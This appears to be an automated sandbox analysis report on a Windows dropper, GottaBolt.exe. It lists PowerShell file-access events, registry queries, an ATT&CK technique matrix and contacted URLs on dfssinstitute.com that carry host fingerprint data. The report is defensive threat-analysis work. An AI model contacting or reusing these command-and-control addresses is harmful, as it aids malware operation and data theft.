Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\YXuuqBFUVgMBaXsghdUv.txt VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\GottaBolt.exe

Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias

Jump to behavior

Source: C:\Users\user\Desktop\GottaBolt.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	2 Windows Service	2 Windows Service	1 Masquerading	1 Input Capture	1 System Time Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	1 DLL Side-Loading	12 Process Injection	1 Disable or Modify Tools	LSASS Memory	111 Security Software Discovery	Remote Desktop Protocol	1 Input Capture	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	141 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Archive Collected Data	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Process Injection	NTDS	141 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	123 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
GottaBolt.exe	5%	ReversingLabs	Win64.Dropper.Generic

Source	Detection	Scanner	Label
https://dfssinstitute.com/?rs=user	0%	Avira URL Cloud	safe
https://dfssinstitute.com/?yjVsmHMwodfFGINSiCsv=YXuuqBFUVgMBaXsghdUv.txt	0%	Avira URL Cloud	safe
https://dfssinstitute.com/	0%	Avira URL Cloud	safe
http://dfssinstitute.com	0%	Avira URL Cloud	safe
http://ocsps.ssl.com0P	0%	Avira URL Cloud	safe
https://dfssinstitute.com/?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f5	0%	Avira URL Cloud	safe
https://dfssinstitute.com/?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7	0%	Avira URL Cloud	safe
https://dfssinstitute.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
dfssinstitute.com	77.91.73.101	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://dfssinstitute.com/?yjVsmHMwodfFGINSiCsv=YXuuqBFUVgMBaXsghdUv.txt	true	Avira URL Cloud: safe	unknown
https://dfssinstitute.com/?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.2368919507.0000024E96770000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4067770851.000001E8ED1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4067770851.000001E8ED333000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000004.00000002.2346622209.0000024E86928000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dfssinstitute.com/?rs=user	GottaBolt.exe, 00000000.00000002.2629516834.00000252802F1000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.0000025280299000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000008.00000002.3942045111.000001E8DD3A6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000004.00000002.2346622209.0000024E86928000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dfssinstitute.com/	GottaBolt.exe	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000008.00000002.3942045111.000001E8DD3A6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 0000000C.00000002.3015755599.000001C1AA3F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3604226839.0000025F86C88000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsps.ssl.com0?	GottaBolt.exe	false		high
https://contoso.com/License	powershell.exe, 00000008.00000002.4067770851.000001E8ED333000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0	GottaBolt.exe	false		high
https://contoso.com/Icon	powershell.exe, 00000008.00000002.4067770851.000001E8ED333000.00000004.00000800.00020000.00000000.sdmp	false		high
http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q	GottaBolt.exe	false		high
http://ocsps.ssl.com0	GottaBolt.exe	false		high
http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0	GottaBolt.exe	false		high
http://www.microsoft.	powershell.exe, 00000004.00000002.2375548989.0000024E9EA7C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0	GottaBolt.exe	false		high
https://github.com/Pester/Pester	powershell.exe, 00000008.00000002.3942045111.000001E8DD3A6000.00000004.00000800.00020000.00000000.sdmp	false		high
